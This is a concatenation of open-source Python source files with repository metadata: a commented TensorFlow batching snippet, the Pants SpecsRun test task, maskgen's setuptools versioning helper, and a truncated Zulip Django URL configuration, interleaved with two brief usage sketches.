#                                   align_corners=True)
#    image = tf.cast(image, tf.uint8)
#
#    batch_size = batch_size
#
#    capacity = min_after_dequeue + 3 * batch_size
#
#    image_batch, label_batch = tf.train.shuffle_batch([image, label],
#                                                      batch_size=batch_size,
#                                                      capacity=capacity,
#                                                      min_after_dequeue=min_after_dequeue,
#                                                      num_threads=num_threads)
#    return image_batch, label_batch
mit
-7,524,138,306,632,480,000
32.561404
91
0.540102
false
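A consumption sketch for the loader above, under TF1.x queue-runner semantics (the CSV path is a placeholder of my choosing): tensors coming from tf.train.slice_input_producer only yield values after queue runners are started.

import tensorflow as tf  # TF1.x, matching the loader above
from cat_nets.datasets.read_pets import catClassification_loader

image, label, idx_to_name = catClassification_loader('annotations.csv')  # assumed CSV of (breed, path) rows
with tf.Session() as sess:
    coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(sess=sess, coord=coord)
    img, lbl = sess.run([image, label])          # one shuffled example
    print(img.shape, idx_to_name[lbl])           # decoded JPEG and breed name
    coord.request_stop()
    coord.join(threads)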
tejal29/pants
src/python/pants/backend/jvm/tasks/specs_run.py
1
3288
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).

from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

from twitter.common.collections import OrderedSet

from pants.backend.jvm.tasks.jvm_task import JvmTask
from pants.backend.jvm.tasks.jvm_tool_task_mixin import JvmToolTaskMixin
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnit
from pants.binary_util import safe_args
from pants.java.util import execute_java


class SpecsRun(JvmTask, JvmToolTaskMixin):
  @classmethod
  def register_options(cls, register):
    super(SpecsRun, cls).register_options(register)
    register('--skip', action='store_true', help='Skip running specs.')
    register('--test', action='append',
             help='Force running of just these specs. Tests can be specified either by fully '
                  'qualified classname or full file path.')
    # TODO: Get rid of this in favor of the inherited global color flag.
    register('--color', action='store_true', default=True,
             help='Emit test result with ANSI terminal color codes.')
    cls.register_jvm_tool(register, 'specs', default=['//:scala-specs'])

  @classmethod
  def prepare(cls, options, round_manager):
    super(SpecsRun, cls).prepare(options, round_manager)

    # TODO(John Sirois): these are fake requirements in order to force compile run before this
    # goal. Introduce a RuntimeClasspath product for JvmCompile and PrepareResources to populate
    # and depend on that.
    # See: https://github.com/pantsbuild/pants/issues/310
    round_manager.require_data('resources_by_target')
    round_manager.require_data('classes_by_target')

  def __init__(self, *args, **kwargs):
    super(SpecsRun, self).__init__(*args, **kwargs)

    self.skip = self.get_options().skip
    self.color = self.get_options().color
    self.tests = self.get_options().test

  def execute(self):
    if not self.skip:
      targets = self.context.targets()

      def run_tests(tests):
        args = ['--color'] if self.color else []
        args.append('--specs=%s' % ','.join(tests))
        specs_runner_main = 'com.twitter.common.testing.ExplicitSpecsRunnerMain'

        bootstrapped_cp = self.tool_classpath('specs')
        classpath = self.classpath(bootstrapped_cp, confs=self.confs)

        result = execute_java(
          classpath=classpath,
          main=specs_runner_main,
          jvm_options=self.jvm_options,
          args=self.args + args,
          workunit_factory=self.context.new_workunit,
          workunit_name='specs',
          workunit_labels=[WorkUnit.TEST]
        )
        if result != 0:
          raise TaskError('java %s ... exited non-zero (%i)' % (specs_runner_main, result))

      if self.tests:
        run_tests(self.tests)
      else:
        with safe_args(self.calculate_tests(targets)) as tests:
          if tests:
            run_tests(tests)

  def calculate_tests(self, targets):
    tests = OrderedSet()
    for target in targets:
      if target.is_scala and target.is_test:
        tests.update(target.sources_relative_to_buildroot())
    return tests
apache-2.0
4,884,048,821,790,029,000
38.142857
96
0.673054
false
rwgdrummer/maskgen
setuptools-version/setuptools_maskgen_version.py
1
1613
from pkg_resources import get_distribution
from subprocess import check_output
import requests
import json

repos = 'rwgdrummer/maskgen'
giturl = 'https://api.github.com/repos'

def get_commit():
    url = giturl + '/' + repos + '/pulls?state=closed'
    resp = requests.get(url)
    if resp.status_code == requests.codes.ok:
        content = json.loads(resp.content)
        for item in content:
            if 'merged_at' in item and 'merge_commit_sha' in item:
                return item['merge_commit_sha']
    return None

def get_version():
    import os
    filename = 'VERSION'
    #if os.path.exists('.git/ORIG_HEAD'):
    #    filename = '.git/ORIG_HEAD'
    #else:
    print os.path.abspath(filename)
    with open(filename) as fp:
        return fp.readline()

def validate_version_format(dist, attr, value):
    try:
        version = get_version().strip()
    except:
        version = get_distribution(dist.get_name()).version
    else:
        version = format_version(version=version, fmt=value)
    dist.metadata.version = version

def format_version(version, fmt='{gitsha}'):
    return fmt.format(gitsha=version)

if __name__ == "__main__":
    # determine version from git
    git_version = get_version().strip()
    git_version = format_version(version=git_version)

    # monkey-patch `setuptools.setup` to inject the git version
    import setuptools
    original_setup = setuptools.setup

    def setup(version=None, *args, **kw):
        return original_setup(version=git_version, *args, **kw)

    setuptools.setup = setup

    # import the package's setup module
    import setup
bsd-3-clause
-12,361,799,161,684,228
27.298246
66
0.651581
false
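A hedged sketch of how a module like this is typically consumed: setuptools invokes keyword validators such as validate_version_format through a distutils.setup_keywords entry point. The keyword name 'version_format' below is my assumption; the record does not show the actual entry-point registration.

# Hypothetical downstream setup.py using the version hook above.
from setuptools import setup

setup(
    name='maskgen',
    version_format='{gitsha}',                     # assumed keyword bound to validate_version_format
    setup_requires=['setuptools_maskgen_version'],  # pulls in the plugin at build time
)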
rishig/zulip
zproject/urls.py
1
36270
from django.conf import settings
from django.conf.urls import url, include
from django.conf.urls.i18n import i18n_patterns
from django.http import HttpResponseBadRequest, HttpRequest, HttpResponse
from django.views.generic import TemplateView, RedirectView
from django.utils.module_loading import import_string
import os
import zerver.forms
from zproject import dev_urls
from zproject.legacy_urls import legacy_urls
from zerver.views.documentation import IntegrationView, MarkdownDirectoryView
from zerver.lib.integrations import WEBHOOK_INTEGRATIONS

from django.contrib.auth.views import (login, password_reset_done,
                                       password_reset_confirm, password_reset_complete)

import zerver.tornado.views
import zerver.views
import zerver.views.auth
import zerver.views.archive
import zerver.views.camo
import zerver.views.compatibility
import zerver.views.home
import zerver.views.email_mirror
import zerver.views.registration
import zerver.views.report
import zerver.views.zephyr
import zerver.views.users
import zerver.views.unsubscribe
import zerver.views.documentation
import zerver.views.user_groups
import zerver.views.user_settings
import zerver.views.muting
import zerver.views.streams
import zerver.views.realm
import zerver.views.digest
import zerver.views.messages
from zerver.context_processors import latest_info_context
import zerver.views.public_export

from zerver.lib.rest import rest_dispatch

if settings.TWO_FACTOR_AUTHENTICATION_ENABLED:
    from two_factor.urls import urlpatterns as tf_urls
    from two_factor.gateways.twilio.urls import urlpatterns as tf_twilio_urls

# NB: There are several other pieces of code which route requests by URL:
#
# - legacy_urls.py contains API endpoints written before the redesign
#   and should not be added to.
#
# - runtornado.py has its own URL list for Tornado views.  See the
#   invocation of web.Application in that file.
#
# - The Nginx config knows which URLs to route to Django or Tornado.
#
# - Likewise for the local dev server in tools/run-dev.py.

# These endpoints constitute the currently designed API (V1), which uses:
# * REST verbs
# * Basic auth (username:password is email:apiKey)
# * Take and return json-formatted data
#
# If you're adding a new endpoint to the code that requires authentication,
# please add it here.
# See rest_dispatch in zerver.lib.rest for an explanation of auth methods used
#
# All of these paths are accessed by either a /json or /api/v1 prefix;
# e.g. `PATCH /json/realm` or `PATCH /api/v1/realm`.
v1_api_and_json_patterns = [
    # realm-level calls
    url(r'^realm$', rest_dispatch,
        {'PATCH': 'zerver.views.realm.update_realm'}),

    # Returns a 204, used by desktop app to verify connectivity status
    url(r'generate_204$', zerver.views.registration.generate_204,
        name='zerver.views.registration.generate_204'),

    url(r'realm/subdomain/(?P<subdomain>\S+)$', zerver.views.realm.check_subdomain_available,
        name='zerver.views.realm.check_subdomain_available'),

    # realm/domains -> zerver.views.realm_domains
    url(r'^realm/domains$', rest_dispatch,
        {'GET': 'zerver.views.realm_domains.list_realm_domains',
         'POST': 'zerver.views.realm_domains.create_realm_domain'}),
    url(r'^realm/domains/(?P<domain>\S+)$', rest_dispatch,
        {'PATCH': 'zerver.views.realm_domains.patch_realm_domain',
         'DELETE': 'zerver.views.realm_domains.delete_realm_domain'}),

    # realm/emoji -> zerver.views.realm_emoji
    url(r'^realm/emoji$', rest_dispatch,
        {'GET': 'zerver.views.realm_emoji.list_emoji'}),
    url(r'^realm/emoji/(?P<emoji_name>.*)$', rest_dispatch,
        {'POST': 'zerver.views.realm_emoji.upload_emoji',
         'DELETE': ('zerver.views.realm_emoji.delete_emoji', {"intentionally_undocumented"})}),
    # this endpoint throws a status code 400 JsonableError when it should be a 404.

    # realm/icon -> zerver.views.realm_icon
    url(r'^realm/icon$', rest_dispatch,
        {'POST': 'zerver.views.realm_icon.upload_icon',
         'DELETE': 'zerver.views.realm_icon.delete_icon_backend',
         'GET': 'zerver.views.realm_icon.get_icon_backend'}),

    # realm/logo -> zerver.views.realm_logo
    url(r'^realm/logo$', rest_dispatch,
        {'POST': 'zerver.views.realm_logo.upload_logo',
         'DELETE': 'zerver.views.realm_logo.delete_logo_backend',
         'GET': 'zerver.views.realm_logo.get_logo_backend'}),

    # realm/filters -> zerver.views.realm_filters
    url(r'^realm/filters$', rest_dispatch,
        {'GET': 'zerver.views.realm_filters.list_filters',
         'POST': 'zerver.views.realm_filters.create_filter'}),
    url(r'^realm/filters/(?P<filter_id>\d+)$', rest_dispatch,
        {'DELETE': 'zerver.views.realm_filters.delete_filter'}),

    # realm/profile_fields -> zerver.views.custom_profile_fields
    url(r'^realm/profile_fields$', rest_dispatch,
        {'GET': 'zerver.views.custom_profile_fields.list_realm_custom_profile_fields',
         'PATCH': 'zerver.views.custom_profile_fields.reorder_realm_custom_profile_fields',
         'POST': 'zerver.views.custom_profile_fields.create_realm_custom_profile_field'}),
    url(r'^realm/profile_fields/(?P<field_id>\d+)$', rest_dispatch,
        {'PATCH': 'zerver.views.custom_profile_fields.update_realm_custom_profile_field',
         'DELETE': 'zerver.views.custom_profile_fields.delete_realm_custom_profile_field'}),

    # realm/deactivate -> zerver.views.deactivate_realm
    url(r'^realm/deactivate$', rest_dispatch,
        {'POST': 'zerver.views.realm.deactivate_realm'}),

    url(r'^realm/presence$', rest_dispatch,
        {'GET': 'zerver.views.presence.get_statuses_for_realm'}),

    # users -> zerver.views.users
    #
    # Since some of these endpoints do something different if used on
    # yourself with `/me` as the email, we need to make sure that we
    # don't accidentally trigger these.  The cleanest way to do that
    # is to add a regular expression assertion that it isn't `/me/`
    # (or ends with `/me`, in the case of hitting the root URL).
    url(r'^users$', rest_dispatch,
        {'GET': 'zerver.views.users.get_members_backend',
         'POST': 'zerver.views.users.create_user_backend'}),
    url(r'^users/(?P<user_id>[0-9]+)/reactivate$', rest_dispatch,
        {'POST': 'zerver.views.users.reactivate_user_backend'}),
    url(r'^users/(?!me/)(?P<email>[^/]*)/presence$', rest_dispatch,
        {'GET': 'zerver.views.presence.get_presence_backend'}),
    url(r'^users/(?P<user_id>[0-9]+)$', rest_dispatch,
        {'PATCH': 'zerver.views.users.update_user_backend',
         'DELETE': 'zerver.views.users.deactivate_user_backend'}),
    url(r'^bots$', rest_dispatch,
        {'GET': 'zerver.views.users.get_bots_backend',
         'POST': 'zerver.views.users.add_bot_backend'}),
    url(r'^bots/(?P<bot_id>[0-9]+)/api_key/regenerate$', rest_dispatch,
        {'POST': 'zerver.views.users.regenerate_bot_api_key'}),
    url(r'^bots/(?P<bot_id>[0-9]+)$', rest_dispatch,
        {'PATCH': 'zerver.views.users.patch_bot_backend',
         'DELETE': 'zerver.views.users.deactivate_bot_backend'}),

    # invites -> zerver.views.invite
    url(r'^invites$', rest_dispatch,
        {'GET': 'zerver.views.invite.get_user_invites',
         'POST': 'zerver.views.invite.invite_users_backend'}),
    url(r'^invites/(?P<prereg_id>[0-9]+)$', rest_dispatch,
        {'DELETE': 'zerver.views.invite.revoke_user_invite'}),
    url(r'^invites/(?P<prereg_id>[0-9]+)/resend$', rest_dispatch,
        {'POST': 'zerver.views.invite.resend_user_invite_email'}),

    # invites/multiuse -> zerver.views.invite
    url(r'^invites/multiuse$', rest_dispatch,
        {'POST': 'zerver.views.invite.generate_multiuse_invite_backend'}),
    # invites/multiuse -> zerver.views.invite
    url(r'^invites/multiuse/(?P<invite_id>[0-9]+)$', rest_dispatch,
        {'DELETE': 'zerver.views.invite.revoke_multiuse_invite'}),

    # mark messages as read (in bulk)
    url(r'^mark_all_as_read$', rest_dispatch,
        {'POST': 'zerver.views.messages.mark_all_as_read'}),
    url(r'^mark_stream_as_read$', rest_dispatch,
        {'POST': 'zerver.views.messages.mark_stream_as_read'}),
    url(r'^mark_topic_as_read$', rest_dispatch,
        {'POST': 'zerver.views.messages.mark_topic_as_read'}),

    url(r'^zcommand$', rest_dispatch,
        {'POST': 'zerver.views.messages.zcommand_backend'}),

    # messages -> zerver.views.messages
    # GET returns messages, possibly filtered, POST sends a message
    url(r'^messages$', rest_dispatch,
        {'GET': 'zerver.views.messages.get_messages_backend',
         'POST': ('zerver.views.messages.send_message_backend',
                  {'allow_incoming_webhooks'})}),
    url(r'^messages/(?P<message_id>[0-9]+)$', rest_dispatch,
        {'GET': 'zerver.views.messages.json_fetch_raw_message',
         'PATCH': 'zerver.views.messages.update_message_backend',
         'DELETE': 'zerver.views.messages.delete_message_backend'}),
    url(r'^messages/render$', rest_dispatch,
        {'POST': 'zerver.views.messages.render_message_backend'}),
    url(r'^messages/flags$', rest_dispatch,
        {'POST': 'zerver.views.messages.update_message_flags'}),
    url(r'^messages/(?P<message_id>\d+)/history$', rest_dispatch,
        {'GET': 'zerver.views.messages.get_message_edit_history'}),
    url(r'^messages/matches_narrow$', rest_dispatch,
        {'GET': 'zerver.views.messages.messages_in_narrow_backend'}),

    url(r'^users/me/subscriptions/properties$', rest_dispatch,
        {'POST': 'zerver.views.streams.update_subscription_properties_backend'}),
    url(r'^users/me/subscriptions/(?P<stream_id>\d+)$', rest_dispatch,
        {'PATCH': 'zerver.views.streams.update_subscriptions_property'}),

    url(r'^submessage$', rest_dispatch,
        {'POST': 'zerver.views.submessage.process_submessage'}),

    # New endpoint for handling reactions.
    url(r'^messages/(?P<message_id>[0-9]+)/reactions$', rest_dispatch,
        {'POST': 'zerver.views.reactions.add_reaction',
         'DELETE': 'zerver.views.reactions.remove_reaction'}),

    # reactions -> zerver.view.reactions
    # PUT adds a reaction to a message
    # DELETE removes a reaction from a message
    url(r'^messages/(?P<message_id>[0-9]+)/emoji_reactions/(?P<emoji_name>.*)$',
        rest_dispatch,
        {'PUT': 'zerver.views.reactions.add_reaction_legacy',
         'DELETE': 'zerver.views.reactions.remove_reaction_legacy'}),

    # attachments -> zerver.views.attachments
    url(r'^attachments$', rest_dispatch,
        {'GET': 'zerver.views.attachments.list_by_user'}),
    url(r'^attachments/(?P<attachment_id>[0-9]+)$', rest_dispatch,
        {'DELETE': 'zerver.views.attachments.remove'}),

    # typing -> zerver.views.typing
    # POST sends a typing notification event to recipients
    url(r'^typing$', rest_dispatch,
        {'POST': 'zerver.views.typing.send_notification_backend'}),

    # user_uploads -> zerver.views.upload
    url(r'^user_uploads$', rest_dispatch,
        {'POST': 'zerver.views.upload.upload_file_backend'}),

    # bot_storage -> zerver.views.storage
    url(r'^bot_storage$', rest_dispatch,
        {'PUT': 'zerver.views.storage.update_storage',
         'GET': 'zerver.views.storage.get_storage',
         'DELETE': 'zerver.views.storage.remove_storage'}),

    # users/me -> zerver.views
    url(r'^users/me$', rest_dispatch,
        {'GET': 'zerver.views.users.get_profile_backend',
         'DELETE': 'zerver.views.users.deactivate_user_own_backend'}),
    # PUT is currently used by mobile apps, we intend to remove the PUT version
    # as soon as possible. POST exists to correct the erroneous use of PUT.
    url(r'^users/me/pointer$', rest_dispatch,
        {'GET': 'zerver.views.pointer.get_pointer_backend',
         'PUT': 'zerver.views.pointer.update_pointer_backend',
         'POST': 'zerver.views.pointer.update_pointer_backend'}),
    url(r'^users/me/presence$', rest_dispatch,
        {'POST': 'zerver.views.presence.update_active_status_backend'}),
    url(r'^users/me/status$', rest_dispatch,
        {'POST': 'zerver.views.presence.update_user_status_backend'}),
    # Endpoint used by mobile devices to register their push
    # notification credentials
    url(r'^users/me/apns_device_token$', rest_dispatch,
        {'POST': 'zerver.views.push_notifications.add_apns_device_token',
         'DELETE': 'zerver.views.push_notifications.remove_apns_device_token'}),
    url(r'^users/me/android_gcm_reg_id$', rest_dispatch,
        {'POST': 'zerver.views.push_notifications.add_android_reg_id',
         'DELETE': 'zerver.views.push_notifications.remove_android_reg_id'}),

    # user_groups -> zerver.views.user_groups
    url(r'^user_groups$', rest_dispatch,
        {'GET': 'zerver.views.user_groups.get_user_group'}),
    url(r'^user_groups/create$', rest_dispatch,
        {'POST': 'zerver.views.user_groups.add_user_group'}),
    url(r'^user_groups/(?P<user_group_id>\d+)$', rest_dispatch,
        {'PATCH': 'zerver.views.user_groups.edit_user_group',
         'DELETE': 'zerver.views.user_groups.delete_user_group'}),
    url(r'^user_groups/(?P<user_group_id>\d+)/members$', rest_dispatch,
        {'POST': 'zerver.views.user_groups.update_user_group_backend'}),

    # users/me -> zerver.views.user_settings
    url(r'^users/me/api_key/regenerate$', rest_dispatch,
        {'POST': 'zerver.views.user_settings.regenerate_api_key'}),
    url(r'^users/me/enter-sends$', rest_dispatch,
        {'POST': ('zerver.views.user_settings.change_enter_sends',
                  # This endpoint should be folded into user settings
                  {'intentionally_undocumented'})}),
    url(r'^users/me/avatar$', rest_dispatch,
        {'POST': 'zerver.views.user_settings.set_avatar_backend',
         'DELETE': 'zerver.views.user_settings.delete_avatar_backend'}),

    # users/me/hotspots -> zerver.views.hotspots
    url(r'^users/me/hotspots$', rest_dispatch,
        {'POST': ('zerver.views.hotspots.mark_hotspot_as_read',
                  # This endpoint is low priority for documentation as
                  # it is part of the webapp-specific tutorial.
                  {'intentionally_undocumented'})}),

    # users/me/tutorial_status -> zerver.views.tutorial
    url(r'^users/me/tutorial_status$', rest_dispatch,
        {'POST': ('zerver.views.tutorial.set_tutorial_status',
                  # This is a relic of an old Zulip tutorial model and
                  # should be deleted.
                  {'intentionally_undocumented'})}),

    # settings -> zerver.views.user_settings
    url(r'^settings$', rest_dispatch,
        {'PATCH': 'zerver.views.user_settings.json_change_settings'}),
    url(r'^settings/display$', rest_dispatch,
        {'PATCH': 'zerver.views.user_settings.update_display_settings_backend'}),
    url(r'^settings/notifications$', rest_dispatch,
        {'PATCH': 'zerver.views.user_settings.json_change_notify_settings'}),

    # users/me/alert_words -> zerver.views.alert_words
    url(r'^users/me/alert_words$', rest_dispatch,
        {'GET': 'zerver.views.alert_words.list_alert_words',
         'POST': 'zerver.views.alert_words.add_alert_words',
         'DELETE': 'zerver.views.alert_words.remove_alert_words'}),

    # users/me/custom_profile_data -> zerver.views.custom_profile_data
    url(r'^users/me/profile_data$', rest_dispatch,
        {'PATCH': 'zerver.views.custom_profile_fields.update_user_custom_profile_data',
         'DELETE': 'zerver.views.custom_profile_fields.remove_user_custom_profile_data'}),

    url(r'^users/me/(?P<stream_id>\d+)/topics$', rest_dispatch,
        {'GET': 'zerver.views.streams.get_topics_backend'}),

    # streams -> zerver.views.streams
    # (this API is only used externally)
    url(r'^streams$', rest_dispatch,
        {'GET': 'zerver.views.streams.get_streams_backend'}),

    # GET returns `stream_id`, stream name should be encoded in the url query (in `stream` param)
    url(r'^get_stream_id$', rest_dispatch,
        {'GET': 'zerver.views.streams.json_get_stream_id'}),

    # GET returns "stream info" (undefined currently?), HEAD returns whether stream exists (200 or 404)
    url(r'^streams/(?P<stream_id>\d+)/members$', rest_dispatch,
        {'GET': 'zerver.views.streams.get_subscribers_backend'}),
    url(r'^streams/(?P<stream_id>\d+)$', rest_dispatch,
        {'PATCH': 'zerver.views.streams.update_stream_backend',
         'DELETE': 'zerver.views.streams.deactivate_stream_backend'}),

    # Delete topic in stream
    url(r'^streams/(?P<stream_id>\d+)/delete_topic$', rest_dispatch,
        {'POST': 'zerver.views.streams.delete_in_topic'}),

    url(r'^default_streams$', rest_dispatch,
        {'POST': 'zerver.views.streams.add_default_stream',
         'DELETE': 'zerver.views.streams.remove_default_stream'}),
    url(r'^default_stream_groups/create$', rest_dispatch,
        {'POST': 'zerver.views.streams.create_default_stream_group'}),
    url(r'^default_stream_groups/(?P<group_id>\d+)$', rest_dispatch,
        {'PATCH': 'zerver.views.streams.update_default_stream_group_info',
         'DELETE': 'zerver.views.streams.remove_default_stream_group'}),
    url(r'^default_stream_groups/(?P<group_id>\d+)/streams$', rest_dispatch,
        {'PATCH': 'zerver.views.streams.update_default_stream_group_streams'}),
    # GET lists your streams, POST bulk adds, PATCH bulk modifies/removes
    url(r'^users/me/subscriptions$', rest_dispatch,
        {'GET': 'zerver.views.streams.list_subscriptions_backend',
         'POST': 'zerver.views.streams.add_subscriptions_backend',
         'PATCH': 'zerver.views.streams.update_subscriptions_backend',
         'DELETE': 'zerver.views.streams.remove_subscriptions_backend'}),

    # muting -> zerver.views.muting
    url(r'^users/me/subscriptions/muted_topics$', rest_dispatch,
        {'PATCH': 'zerver.views.muting.update_muted_topic'}),

    # used to register for an event queue in tornado
    url(r'^register$', rest_dispatch,
        {'POST': 'zerver.views.events_register.events_register_backend'}),

    # events -> zerver.tornado.views
    url(r'^events$', rest_dispatch,
        {'GET': 'zerver.tornado.views.get_events',
         'DELETE': 'zerver.tornado.views.cleanup_event_queue'}),

    # report -> zerver.views.report
    #
    # These endpoints are for internal error/performance reporting
    # from the browser to the webapp, and we don't expect to ever
    # include in our API documentation.
    url(r'^report/error$', rest_dispatch,
        # Logged-out browsers can hit this endpoint, for portico page JS exceptions.
        {'POST': ('zerver.views.report.report_error', {'allow_anonymous_user_web',
                                                       'intentionally_undocumented'})}),
    url(r'^report/send_times$', rest_dispatch,
        {'POST': ('zerver.views.report.report_send_times',
                  {'intentionally_undocumented'})}),
    url(r'^report/narrow_times$', rest_dispatch,
        {'POST': ('zerver.views.report.report_narrow_times',
                  {'intentionally_undocumented'})}),
    url(r'^report/unnarrow_times$', rest_dispatch,
        {'POST': ('zerver.views.report.report_unnarrow_times',
                  {'intentionally_undocumented'})}),

    # Used to generate a Zoom video call URL
    url(r'^calls/create$', rest_dispatch,
        {'GET': 'zerver.views.video_calls.get_zoom_url'}),

    # Used for public-only realm exporting
    url(r'^export/realm$', rest_dispatch,
        {'POST': 'zerver.views.public_export.public_only_realm_export'}),
]

# These views serve pages (HTML). As such, their internationalization
# must depend on the url.
#
# If you're adding a new page to the website (as opposed to a new
# endpoint for use by code), you should add it here.
i18n_urls = [
    url(r'^$', zerver.views.home.home, name='zerver.views.home.home'),
    # We have a desktop-specific landing page in case we change our /
    # to not log in in the future. We don't want to require a new
    # desktop app build for everyone in that case
    url(r'^desktop_home/$', zerver.views.home.desktop_home,
        name='zerver.views.home.desktop_home'),

    url(r'^accounts/login/sso/$', zerver.views.auth.remote_user_sso, name='login-sso'),
    url(r'^accounts/login/jwt/$', zerver.views.auth.remote_user_jwt, name='login-jwt'),
    url(r'^accounts/login/social/([\w,-]+)$', zerver.views.auth.start_social_login,
        name='login-social'),
    url(r'^accounts/register/social/([\w,-]+)$', zerver.views.auth.start_social_signup,
        name='signup-social'),
    url(r'^accounts/login/google/$', zerver.views.auth.start_google_oauth2,
        name='zerver.views.auth.start_google_oauth2'),
    url(r'^accounts/login/google/send/$', zerver.views.auth.send_oauth_request_to_google,
        name='zerver.views.auth.send_oauth_request_to_google'),
    url(r'^accounts/login/google/done/$', zerver.views.auth.finish_google_oauth2,
        name='zerver.views.auth.finish_google_oauth2'),
    url(r'^accounts/login/subdomain/([^/]+)$', zerver.views.auth.log_into_subdomain,
        name='zerver.views.auth.log_into_subdomain'),
    url(r'^accounts/login/local/$', zerver.views.auth.dev_direct_login,
        name='zerver.views.auth.dev_direct_login'),
    # We have two entries for accounts/login; only the first one is
    # used for URL resolution.  The second here is to allow
    # reverse("django.contrib.auth.views.login") in templates to
    # return `/accounts/login/`.
    url(r'^accounts/login/', zerver.views.auth.login_page,
        {'template_name': 'zerver/login.html'}, name='zerver.views.auth.login_page'),
    url(r'^accounts/login/', login, {'template_name': 'zerver/login.html'},
        name='django.contrib.auth.views.login'),
    url(r'^accounts/logout/', zerver.views.auth.logout_then_login,
        name='zerver.views.auth.logout_then_login'),

    url(r'^accounts/webathena_kerberos_login/',
        zerver.views.zephyr.webathena_kerberos_login,
        name='zerver.views.zephyr.webathena_kerberos_login'),

    url(r'^accounts/password/reset/$', zerver.views.auth.password_reset,
        name='zerver.views.auth.password_reset'),
    url(r'^accounts/password/reset/done/$', password_reset_done,
        {'template_name': 'zerver/reset_emailed.html'}),
    url(r'^accounts/password/reset/(?P<uidb64>[0-9A-Za-z]+)/(?P<token>.+)/$',
        password_reset_confirm,
        {'post_reset_redirect': '/accounts/password/done/',
         'template_name': 'zerver/reset_confirm.html',
         'set_password_form': zerver.forms.LoggingSetPasswordForm},
        name='django.contrib.auth.views.password_reset_confirm'),
    url(r'^accounts/password/done/$', password_reset_complete,
        {'template_name': 'zerver/reset_done.html'}),
    url(r'^accounts/deactivated/',
        zerver.views.auth.show_deactivation_notice,
        name='zerver.views.auth.show_deactivation_notice'),

    # Displays digest email content in browser.
    url(r'^digest/$', zerver.views.digest.digest_page),

    # Registration views, require a confirmation ID.
    url(r'^accounts/home/', zerver.views.registration.accounts_home,
        name='zerver.views.registration.accounts_home'),
    url(r'^accounts/send_confirm/(?P<email>[\S]+)?',
        TemplateView.as_view(template_name='zerver/accounts_send_confirm.html'),
        name='signup_send_confirm'),
    url(r'^accounts/new/send_confirm/(?P<email>[\S]+)?',
        TemplateView.as_view(template_name='zerver/accounts_send_confirm.html'),
        {'realm_creation': True}, name='new_realm_send_confirm'),
    url(r'^accounts/register/', zerver.views.registration.accounts_register,
        name='zerver.views.registration.accounts_register'),
    url(r'^accounts/do_confirm/(?P<confirmation_key>[\w]+)',
        zerver.views.registration.check_prereg_key_and_redirect,
        name='check_prereg_key_and_redirect'),

    url(r'^accounts/confirm_new_email/(?P<confirmation_key>[\w]+)',
        zerver.views.user_settings.confirm_email_change,
        name='zerver.views.user_settings.confirm_email_change'),

    # Email unsubscription endpoint. Allows for unsubscribing from various types of emails,
    # including the welcome emails (day 1 & 2), missed PMs, etc.
    url(r'^accounts/unsubscribe/(?P<email_type>[\w]+)/(?P<confirmation_key>[\w]+)',
        zerver.views.unsubscribe.email_unsubscribe,
        name='zerver.views.unsubscribe.email_unsubscribe'),

    # Portico-styled page used to provide email confirmation of terms acceptance.
    url(r'^accounts/accept_terms/$', zerver.views.home.accounts_accept_terms,
        name='zerver.views.home.accounts_accept_terms'),

    # Find your account
    url(r'^accounts/find/$', zerver.views.registration.find_account,
        name='zerver.views.registration.find_account'),

    # Go to organization subdomain
    url(r'^accounts/go/$', zerver.views.registration.realm_redirect,
        name='zerver.views.registration.realm_redirect'),

    # Realm Creation
    url(r'^new/$', zerver.views.registration.create_realm,
        name='zerver.views.create_realm'),
    url(r'^new/(?P<creation_key>[\w]+)$', zerver.views.registration.create_realm,
        name='zerver.views.create_realm'),

    # Realm Reactivation
    url(r'^reactivate/(?P<confirmation_key>[\w]+)', zerver.views.realm.realm_reactivation,
        name='zerver.views.realm.realm_reactivation'),

    # Global public streams (Zulip's way of doing archives)
    url(r'^archive/streams/(?P<stream_id>\d+)/topics/(?P<topic_name>[^/]+)$',
        zerver.views.archive.archive,
        name='zerver.views.archive.archive'),
    url(r'^archive/streams/(?P<stream_id>\d+)/topics$',
        zerver.views.archive.get_web_public_topics_backend,
        name='zerver.views.archive.get_web_public_topics_backend'),

    # Login/registration
    url(r'^register/$', zerver.views.registration.accounts_home, name='register'),
    url(r'^login/$', zerver.views.auth.login_page, {'template_name': 'zerver/login.html'},
        name='zerver.views.auth.login_page'),

    url(r'^join/(?P<confirmation_key>\S+)/$',
        zerver.views.registration.accounts_home_from_multiuse_invite,
        name='zerver.views.registration.accounts_home_from_multiuse_invite'),

    # API and integrations documentation
    url(r'^integrations/doc-html/(?P<integration_name>[^/]*)$',
        zerver.views.documentation.integration_doc,
        name="zerver.views.documentation.integration_doc"),
    url(r'^integrations/(.*)', IntegrationView.as_view()),
    url(r'^team/$', zerver.views.users.team_view),
    url(r'^history/$', TemplateView.as_view(template_name='zerver/history.html')),
    url(r'^apps/(.*)', zerver.views.home.apps_view, name='zerver.views.home.apps_view'),
    url(r'^plans/$', zerver.views.home.plans_view, name='plans'),

    # Landing page, features pages, signup form, etc.
    url(r'^hello/$', TemplateView.as_view(template_name='zerver/hello.html',
                                          get_context_data=latest_info_context),
        name='landing-page'),
    url(r'^new-user/$', RedirectView.as_view(url='/hello', permanent=True)),
    url(r'^features/$', TemplateView.as_view(template_name='zerver/features.html')),
    url(r'^why-zulip/$', TemplateView.as_view(template_name='zerver/why-zulip.html')),
    url(r'^for/open-source/$', TemplateView.as_view(template_name='zerver/for-open-source.html')),
    url(r'^for/companies/$', TemplateView.as_view(template_name='zerver/for-companies.html')),
    url(r'^for/working-groups-and-communities/$',
        TemplateView.as_view(template_name='zerver/for-working-groups-and-communities.html')),
    url(r'^for/mystery-hunt/$', TemplateView.as_view(template_name='zerver/for-mystery-hunt.html')),
    url(r'^security/$', TemplateView.as_view(template_name='zerver/security.html')),
    url(r'^atlassian/$', TemplateView.as_view(template_name='zerver/atlassian.html')),

    # Terms of Service and privacy pages.
    url(r'^terms/$', TemplateView.as_view(template_name='zerver/terms.html'), name='terms'),
    url(r'^privacy/$', TemplateView.as_view(template_name='zerver/privacy.html'), name='privacy'),

    url(r'^config-error/google$', TemplateView.as_view(
        template_name='zerver/config_error.html',),
        {'google_error': True},),
    url(r'^config-error/github$', TemplateView.as_view(
        template_name='zerver/config_error.html',),
        {'github_error': True},),
